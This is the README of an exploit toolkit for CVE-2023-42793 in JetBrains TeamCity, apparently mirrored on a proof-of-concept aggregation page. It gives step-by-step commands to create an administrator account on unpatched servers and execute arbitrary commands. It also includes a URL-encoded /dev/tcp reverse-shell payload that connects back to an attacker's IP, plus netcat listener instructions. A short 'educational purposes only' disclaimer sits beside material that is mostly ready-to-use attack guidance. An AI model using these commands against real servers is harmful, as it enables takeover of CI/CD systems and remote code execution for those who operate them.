来源

关联漏洞

描述

JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE), CVE-2023-42793

介绍

# CVE-2023-42793 - TeamCity Admin Account Creation lead to RCE
>  use `exploit.py` first to creat administrator account for you and then use `rce.py` to execute commands on the target, and for reverse shell check [this](https://github.com/Zyad-Elsayed/CVE-2023-42793?tab=readme-ov-file#for-reverse-shell)  

# exploit script

## Description
This script exploits CVE-2023-42793 to create an admin account on a TeamCity server. It sends a POST request to the target URL to create an admin user with specified or random credentials.

## Usage
```bash
python exploit.py -u <URL> [-v] [-n <USERNAME>] [-p <PASSWORD>] [-e <EMAIL>]
```

### Options
- `-u, --url URL`: Target URL (required)
- `-v, --verbose`: Enable verbose mode
- `-n, --username USERNAME`: Specify username (default: random)
- `-p, --password PASSWORD`: Specify password (default: random)
- `-e, --email EMAIL`: Specify email (default: random)
- `-t, --token-file`: File to save the token
## Prerequisites
- Python 3.x
- Python libraries
    + To install the dependencies `pip3 install -r requirements.txt`

## Examples
1. Exploit with random username, password, and email:
   ```bash
   python exploit.py -u http://target.com
   ```

2. Exploit with specified username, password, and email:
    ```bash
    python exploit.py -u http://target.com -n admin -p admin123 -e admin@example.com
    ```


## Output
Upon successful exploitation, the script prints the URL, username, and password of the created admin account then save the output in token file.

# Remote Code Execution (RCE) Script
Description
This script allows executing commands on a vulnerable TeamCity server exploiting CVE-2023-42793. It first enables the debug processes and then executes the specified command using the appropriate API endpoints.

## Usage
```bash
python rce_exploit.py -u <URL> [-v] [-c <COMMAND>] [-P <PORT>]
```
## Options
- `-u, --url URL` : Target URL (required)
- `-t, --token-file` : TO specify the file containing the token
- `-c, --command COMMAND`: Specify command to execute (RCE)
- `-P, --port PORT`: Specify port (default is 80)

## Example
Exploit with a specified command:
```bash
python rce.py -u http://target.com -t token -c "whoami"
```
## For reverse shell
```bash
python3 rce.py -u http://target.com -t token -c '"/bin/bash"&params="-c"&params="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
```
+ In this command for reverse shell replace {IP} with your ip and {port} with the port you are listening on
+ Creat a listener using nc for ex `nc -nvlp 5555`
+ For more check [revshells](https://www.revshells.com/)

## Notes
- This script has been tested on [Runner.htb](https://app.hackthebox.com/machines/598) from hack the box
- This script is for educational purposes only.
- Use it responsibly and only on systems you are authorized to test.

## Credits
- Zyad Elsayed
  + GitHub Repository: [Zyad-Elsayed](https://github.com/Zyad-Elsayed)
  + LinkedIn account: [zyad-abdelbary](https://www.linkedin.com/in/zyad-abdelbary/)
- Original Exploit for admin account: ByteHunter ([Exploit-DB](https://www.exploit-db.com/exploits/51884))

## Resources

- [CVE-2023-42793 Description](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-42793): Official description of the CVE vulnerability.
- [Exploit Database Entry](https://www.exploit-db.com/exploits/51884): Original exploit code on Exploit Database.
- [TeamCity Blog](https://blog.jetbrains.com/teamcity/2023/10/cve-2023-42793-vulnerability-in-teamcity-october-18-2023-update/): Blog post discussing the CVE-2023-42793 vulnerability in TeamCity.
- [TeamCity Documentation](https://www.jetbrains.com/help/teamcity/): Official documentation for TeamCity.

文件快照

 [4.0K]  /data/pocs/05d7f165639e093454662cdc4463f4943b141166
├── [4.6K]  exploit.py
├── [1.3K]  rce.py
├── [3.6K]  README.md
└── [  18]  requirements.txt

0 directories, 4 files

备注